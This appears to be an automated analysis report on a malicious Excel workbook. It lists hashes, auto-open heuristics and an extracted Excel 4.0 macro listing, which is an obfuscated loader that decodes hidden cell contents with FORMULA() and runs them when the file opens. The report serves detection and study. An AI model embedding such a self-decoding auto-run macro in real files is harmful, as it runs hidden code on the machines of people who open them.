Office (OLE) malware analysis — malicious · 4e30f3b25e4560fa

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:46:57 Authoring application: Microsoft Excel First seen: 2022-07-02

MD5: 8e53c084f302d6f7988e58375c43eb50 SHA-1: e5a87e8b79015ec8bd8998e537a59a6655391a20 SHA-256: 4e30f3b25e4560fa30d8a1afb3965d88f41ee12b97985117a767f88fd7c653c9

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6789 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6789 bytes
SHA-256: `d60fcdaac3b1388dfe9c3211da0e7a748f6f38fdf33a38cbaf0077187e46382e`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - HdIPRJBHnsQ ' 0018 26 LABEL : Cell Value, String Constant - ATvByPrIqOi len=0 ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!D175 ' 0018 21 LABEL : Cell Value, String Constant - AyEpqX len=0 ' 0018 26 LABEL : Cell Value, String Constant - CePWrEzTgui len=0 ' 0018 27 LABEL : Cell Value, String Constant - CIXFZEnoVHaS len=0 ' 0018 27 LABEL : Cell Value, String Constant - FcqQlmLlCmZo len=0 ' 0018 25 LABEL : Cell Value, String Constant - gkXnkvOuAm len=0 ' 0018 27 LABEL : Cell Value, String Constant - GoHMWQBApzWr len=0 ' 0018 20 LABEL : Cell Value, String Constant - JavhQ len=0 ' 0018 27 LABEL : Cell Value, String Constant - LIlvgVWQyaZE len=0 ' 0018 20 LABEL : Cell Value, String Constant - noLly len=0 ' 0018 27 LABEL : Cell Value, String Constant - NXpMCDRjydMW len=0 ' 0018 26 LABEL : Cell Value, String Constant - oxtvaiZWBYE len=0 ' 0018 23 LABEL : Cell Value, String Constant - PtsZYqMG len=0 ' 0018 26 LABEL : Cell Value, String Constant - pylQzcirdyl len=0 ' 0018 24 LABEL : Cell Value, String Constant - qwZKJeToj len=0 ' 0018 22 LABEL : Cell Value, String Constant - RALfKnH len=0 ' 0018 27 LABEL : Cell Value, String Constant - XGYApowaZhIS len=0 ' 0018 24 LABEL : Cell Value, String Constant - yDZfWXnDX len=0 ' 0018 25 LABEL : Cell Value, String Constant - YfImCvrYKz len=0 ' 0018 25 LABEL : Cell Value, String Constant - ZbiZlnWgtv len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' HdIPRJBHnsQ,D87,"SET.NAME("CIXFZEnoVHaS",VALUE("0"))","" ' HdIPRJBHnsQ,D92,"SET.NAME("PtsZYqMG",CIXFZEnoVHaS)","" ' HdIPRJBHnsQ,D96,"SET.NAME("noLly",CIXFZEnoVHaS)","" ' HdIPRJBHnsQ,D98,"SET.NAME("XGYApowaZhIS",COUNTA(oxtvaiZWBYE))","" ' HdIPRJBHnsQ,D101,"SET.NAME("yDZfWXnDX",COUNTA(NXpMCDRjydMW))","" ' HdIPRJBHnsQ,D103,[],"" ' HdIPRJBHnsQ,D106,"SET.NAME("LIlvgVWQyaZE","")","" ' HdIPRJBHnsQ,D109,"PtsZYqMG","" ' HdIPRJBHnsQ,D112,"SET.NAME("AyEpqX",HLOOKUP("",oxtvaiZWBYE,PtsZYqMG,FALSE))","" ' HdIPRJBHnsQ,D117,"YfImCvrYKz","" ' HdIPRJBHnsQ,D122,"SET.NAME("ATvByPrIqOi",CIXFZEnoVHaS)","" ' HdIPRJBHnsQ,D125,[],"" ' HdIPRJBHnsQ,D127,"ATvByPrIqOi","" ' HdIPRJBHnsQ,D132,"gkXnkvOuAm","" ' HdIPRJBHnsQ,D137,"CePWrEzTgui","" ' HdIPRJBHnsQ,D140,"GoHMWQBApzWr","" ' HdIPRJBHnsQ,D142,"SET.NAME("RALfKnH",VALUE(HLOOKUP("",NXpMCDRjydMW,GoHMWQBApzWr,FALSE)))","" ' HdIPRJBHnsQ,D146,"qwZKJeToj","" ' HdIPRJBHnsQ,D149,"LIlvgVWQyaZE","" ' HdIPRJBHnsQ,D152,"noLly","" ' HdIPRJBHnsQ,D157,NEXT(),"" ' HdIPRJBHnsQ,D161,"pylQzcirdyl","" ' HdIPRJBHnsQ,D163,"SET.NAME("f",INT(T(FORMULA(T(LIlvgVWQyaZE)&"",""&T(pylQzcirdyl)))))","" ' HdIPRJBHnsQ,D165,"ZbiZlnWgtv","" ' HdIPRJBHnsQ,D168,NEXT(),"" ' HdIPRJBHnsQ,D173,RETURN(),"" ' HdIPRJBHnsQ,D200,"SET.NAME("JavhQ",D87)","" ' HdIPRJBHnsQ,D204,"oxtvaiZWBYE","" ' HdIPRJBHnsQ,D209,"SET.NAME("NXpMCDRjydMW",R80C13)","" ' HdIPRJBHnsQ,D214,"SET.NAME("ZbiZlnWgtv",222)","" ' HdIPRJBHnsQ,D219,"SET.NAME("FcqQlmLlCmZo",4)","" ' HdIPRJBHnsQ,D221,JavhQ(),"" ' HdIPRJBHnsQ,D222,HALT(),""

SHA-256: d60fcdaac3b1388dfe9c3211da0e7a748f6f38fdf33a38cbaf0077187e46382e

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  HdIPRJBHnsQ
' 0018     26 LABEL : Cell Value, String Constant - ATvByPrIqOi len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D175 
' 0018     21 LABEL : Cell Value, String Constant - AyEpqX len=0 
' 0018     26 LABEL : Cell Value, String Constant - CePWrEzTgui len=0 
' 0018     27 LABEL : Cell Value, String Constant - CIXFZEnoVHaS len=0 
' 0018     27 LABEL : Cell Value, String Constant - FcqQlmLlCmZo len=0 
' 0018     25 LABEL : Cell Value, String Constant - gkXnkvOuAm len=0 
' 0018     27 LABEL : Cell Value, String Constant - GoHMWQBApzWr len=0 
' 0018     20 LABEL : Cell Value, String Constant - JavhQ len=0 
' 0018     27 LABEL : Cell Value, String Constant - LIlvgVWQyaZE len=0 
' 0018     20 LABEL : Cell Value, String Constant - noLly len=0 
' 0018     27 LABEL : Cell Value, String Constant - NXpMCDRjydMW len=0 
' 0018     26 LABEL : Cell Value, String Constant - oxtvaiZWBYE len=0 
' 0018     23 LABEL : Cell Value, String Constant - PtsZYqMG len=0 
' 0018     26 LABEL : Cell Value, String Constant - pylQzcirdyl len=0 
' 0018     24 LABEL : Cell Value, String Constant - qwZKJeToj len=0 
' 0018     22 LABEL : Cell Value, String Constant - RALfKnH len=0 
' 0018     27 LABEL : Cell Value, String Constant - XGYApowaZhIS len=0 
' 0018     24 LABEL : Cell Value, String Constant - yDZfWXnDX len=0 
' 0018     25 LABEL : Cell Value, String Constant - YfImCvrYKz len=0 
' 0018     25 LABEL : Cell Value, String Constant - ZbiZlnWgtv len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  HdIPRJBHnsQ,D87,"SET.NAME("CIXFZEnoVHaS",VALUE("0"))",""
'  HdIPRJBHnsQ,D92,"SET.NAME("PtsZYqMG",CIXFZEnoVHaS)",""
'  HdIPRJBHnsQ,D96,"SET.NAME("noLly",CIXFZEnoVHaS)",""
'  HdIPRJBHnsQ,D98,"SET.NAME("XGYApowaZhIS",COUNTA(oxtvaiZWBYE))",""
'  HdIPRJBHnsQ,D101,"SET.NAME("yDZfWXnDX",COUNTA(NXpMCDRjydMW))",""
'  HdIPRJBHnsQ,D103,[],""
'  HdIPRJBHnsQ,D106,"SET.NAME("LIlvgVWQyaZE","")",""
'  HdIPRJBHnsQ,D109,"PtsZYqMG",""
'  HdIPRJBHnsQ,D112,"SET.NAME("AyEpqX",HLOOKUP("*",oxtvaiZWBYE,PtsZYqMG,FALSE))",""
'  HdIPRJBHnsQ,D117,"YfImCvrYKz",""
'  HdIPRJBHnsQ,D122,"SET.NAME("ATvByPrIqOi",CIXFZEnoVHaS)",""
'  HdIPRJBHnsQ,D125,[],""
'  HdIPRJBHnsQ,D127,"ATvByPrIqOi",""
'  HdIPRJBHnsQ,D132,"gkXnkvOuAm",""
'  HdIPRJBHnsQ,D137,"CePWrEzTgui",""
'  HdIPRJBHnsQ,D140,"GoHMWQBApzWr",""
'  HdIPRJBHnsQ,D142,"SET.NAME("RALfKnH",VALUE(HLOOKUP("*",NXpMCDRjydMW,GoHMWQBApzWr,FALSE)))",""
'  HdIPRJBHnsQ,D146,"qwZKJeToj",""
'  HdIPRJBHnsQ,D149,"LIlvgVWQyaZE",""
'  HdIPRJBHnsQ,D152,"noLly",""
'  HdIPRJBHnsQ,D157,NEXT(),""
'  HdIPRJBHnsQ,D161,"pylQzcirdyl",""
'  HdIPRJBHnsQ,D163,"SET.NAME("f",INT(T(FORMULA(T(LIlvgVWQyaZE)&"",""&T(pylQzcirdyl)))))",""
'  HdIPRJBHnsQ,D165,"ZbiZlnWgtv",""
'  HdIPRJBHnsQ,D168,NEXT(),""
'  HdIPRJBHnsQ,D173,RETURN(),""
'  HdIPRJBHnsQ,D200,"SET.NAME("JavhQ",D87)",""
'  HdIPRJBHnsQ,D204,"oxtvaiZWBYE",""
'  HdIPRJBHnsQ,D209,"SET.NAME("NXpMCDRjydMW",R80C13)",""
'  HdIPRJBHnsQ,D214,"SET.NAME("ZbiZlnWgtv",222)",""
'  HdIPRJBHnsQ,D219,"SET.NAME("FcqQlmLlCmZo",4)",""
'  HdIPRJBHnsQ,D221,JavhQ(),""
'  HdIPRJBHnsQ,D222,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.